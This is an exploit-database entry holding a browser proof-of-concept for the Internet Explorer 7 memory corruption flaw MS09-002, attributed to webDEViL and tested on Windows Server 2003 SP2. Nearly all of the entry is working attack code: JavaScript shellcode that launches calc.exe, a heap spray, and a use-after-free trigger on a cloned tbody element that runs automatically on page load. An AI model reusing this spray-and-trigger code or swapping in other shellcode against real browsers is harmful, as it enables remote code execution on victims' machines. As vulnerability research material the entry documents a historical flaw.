MS Internet Explorer 7 Memory Corruption PoC (MS09-002) (win2k3sp2)

2009-02-20T00:00:00
ID 1337DAY-ID-9377
Type zdt
Reporter webDEViL
Modified 2009-02-20T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            ===================================================================
MS Internet Explorer 7 Memory Corruption PoC (MS09-002) (win2k3sp2)
===================================================================




<!-- Calculator should spawn. changed the block size. tested on 2003 Server SP2. webDEViL -->

<script language="JavaScript">

var c=unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");

var array = new Array(); 

var ls = 0xd00000; 

var b = unescape("%u0c0c%u0c0c"); 
while(b.length<ls/2) { b+=b;} 
var lh = b.substring(0,ls/2); 
delete b; 

for(i=0; i<0xC0; i++) { 
	array[i] = lh + c;
} 
 CollectGarbage();


var s1=unescape("%u9090%u9090AAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

function ok() { 
	o1=document.createElement("tbody"); 
	o1.click; 
	var o2 = o1.cloneNode();	
	o1.clearAttributes(); 
	o1=null; CollectGarbage(); 
	for(var x=0;x<a1.length;x++) a1[x].src=s1; 
	o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>



#  0day.today [2018-01-04]  #